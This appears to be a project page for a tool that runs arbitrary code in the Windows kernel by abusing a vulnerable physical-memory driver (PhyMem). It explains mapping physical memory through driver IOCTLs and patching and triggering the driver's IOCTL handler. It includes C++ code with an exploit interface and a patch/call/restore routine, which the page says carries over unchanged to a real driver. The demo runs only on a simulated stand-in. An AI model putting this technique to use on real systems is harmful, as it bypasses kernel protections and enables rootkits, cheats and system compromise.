Arbitrary code execution inside a vulnerable driver
How does this work?
How can I customize it?
This solution ships with a PhyMem example out of the box.
You can use any driver you want.
Dolboeb-executor has an abstract interface for creating your own 'exploit' classes.
The PhyMem example overrides it like this.
A short explanation of how the PhyMem exploit works:
Nothing fancy: it sends IOCTLs with the map/unmap codes to the driver,
then reads from or writes to the mapped regions.
The function this RVA points to (line 70) is the IOCTL handler.
So we patch it with our stub and then trigger it with an IOCTL. Any IOCTL that reaches the driver runs the stub from then on, so the original bytes are put back once the stub has run.
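The map/patch/call/restore flow above, as an added example written for this page (it is not Dolboeb-executor's own code): an abstract exploit interface in the spirit of the one the project describes, a constructed in-memory stand-in for the PhyMem driver, and the patch routine. The method names, the page size, the handler address and every byte string are assumptions; the stand-in executes nothing and only records which bytes the dispatcher would have run, and the translation of driver_base + RVA into the physical address handed to the routine is outside this example.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <stdexcept>
#include <vector>

// Abstract exploit interface (assumed names): map/unmap a physical range into
// our process, and send any IOCTL so the driver's dispatcher runs.
struct PhysMemExploit {
    virtual ~PhysMemExploit() = default;
    virtual uint8_t* map(uint64_t phys, size_t len) = 0;
    virtual void unmap(uint8_t* view, size_t len) = 0;
    virtual void call_ioctl() = 0;   // reaches the (patched) IOCTL handler
};

static constexpr uint64_t kPageSize = 0x1000;
static constexpr size_t kSnapshot = 16;

// Constructed stand-in for the driver: a few pages of "physical memory" in a
// vector. map() returns a pointer straight into it, so writes land at once,
// as they do through a real physical-memory mapping.
class FakePhysMem : public PhysMemExploit {
public:
    explicit FakePhysMem(size_t pages) : mem_(pages * kPageSize, 0x90) {}

    uint8_t* map(uint64_t phys, size_t len) override {
        if (phys % kPageSize != 0 || len % kPageSize != 0)
            throw std::invalid_argument("mapping must be page-aligned");
        if (phys + len > mem_.size())
            throw std::out_of_range("mapping outside simulated RAM");
        ++active_;
        return mem_.data() + phys;
    }
    void unmap(uint8_t* view, size_t) override {
        if (view < mem_.data() || view >= mem_.data() + mem_.size())
            throw std::invalid_argument("unmap of unknown view");
        --active_;
    }
    // Simulated dispatch: snapshot the bytes at handler_pa instead of running them.
    void call_ioctl() override {
        last_executed.assign(mem_.begin() + static_cast<ptrdiff_t>(handler_pa),
                             mem_.begin() + static_cast<ptrdiff_t>(handler_pa + kSnapshot));
    }
    void poke(uint64_t pa, const std::vector<uint8_t>& b) {
        std::copy(b.begin(), b.end(), mem_.begin() + static_cast<ptrdiff_t>(pa));
    }
    std::vector<uint8_t> peek(uint64_t pa, size_t n) const {
        return {mem_.begin() + static_cast<ptrdiff_t>(pa), mem_.begin() + static_cast<ptrdiff_t>(pa + n)};
    }
    int active_mappings() const { return active_; }

    uint64_t handler_pa = 0;          // where the stand-in believes the handler lives
    std::vector<uint8_t> last_executed;
private:
    std::vector<uint8_t> mem_;
    int active_ = 0;
};

// Physical mappings are page-granular: the span to map must start at the page
// containing `pa` and cover the last byte of the stub, even across a boundary.
size_t mapping_span(uint64_t pa, size_t len) {
    uint64_t first = pa & ~(kPageSize - 1);
    uint64_t last = (pa + len + kPageSize - 1) & ~(kPageSize - 1);
    return static_cast<size_t>(last - first);
}

// Overwrite the handler at physical address handler_pa (assumed already
// translated from driver_base + RVA) with `stub`, trigger it via IOCTL, then
// restore the original bytes. Returns the bytes that were overwritten.
std::vector<uint8_t> patch_call_restore(PhysMemExploit& ex, uint64_t handler_pa,
                                        const std::vector<uint8_t>& stub) {
    if (stub.empty()) throw std::invalid_argument("empty stub");
    uint64_t page = handler_pa & ~(kPageSize - 1);
    size_t len = mapping_span(handler_pa, stub.size());
    uint8_t* view = ex.map(page, len);
    uint8_t* target = view + (handler_pa - page);     // offset within the mapping
    std::vector<uint8_t> saved(target, target + stub.size());
    std::memcpy(target, stub.data(), stub.size());
    ex.call_ioctl();                                   // dispatcher now runs the stub
    std::memcpy(target, saved.data(), saved.size());   // leave the driver as we found it
    ex.unmap(view, len);
    return saved;
}

// End-to-end run on the stand-in with a handler placed across a page boundary.
bool demo() {
    FakePhysMem fake(4);
    const uint64_t handler_pa = 0x1FFC;                // straddles the 0x2000 boundary
    const std::vector<uint8_t> original = {0x55, 0x48, 0x89, 0xE5, 0x48, 0x83, 0xEC, 0x20}; // push rbp; mov rbp,rsp; sub rsp,0x20
    const std::vector<uint8_t> stub = {0xB8, 0x37, 0x13, 0x00, 0x00, 0xC3};                 // mov eax,0x1337; ret
    fake.handler_pa = handler_pa;
    fake.poke(handler_pa, original);
    std::vector<uint8_t> saved = patch_call_restore(fake, handler_pa, stub);
    bool ran_stub = std::equal(stub.begin(), stub.end(), fake.last_executed.begin());
    bool restored = fake.peek(handler_pa, original.size()) == original;
    bool saved_ok = saved == std::vector<uint8_t>(original.begin(), original.begin() + stub.size());
    return ran_stub && restored && saved_ok && fake.active_mappings() == 0;
}
```

Against a real driver the FakePhysMem class is replaced by an implementation whose map/unmap send the driver's IOCTL codes and whose call_ioctl sends any code at all; the patch routine itself does not change. The page-span computation is the part that bites in practice: a stub written at a page-aligned mapping without accounting for the offset of the handler inside the page, or for a handler that ends past the page boundary, corrupts the wrong bytes.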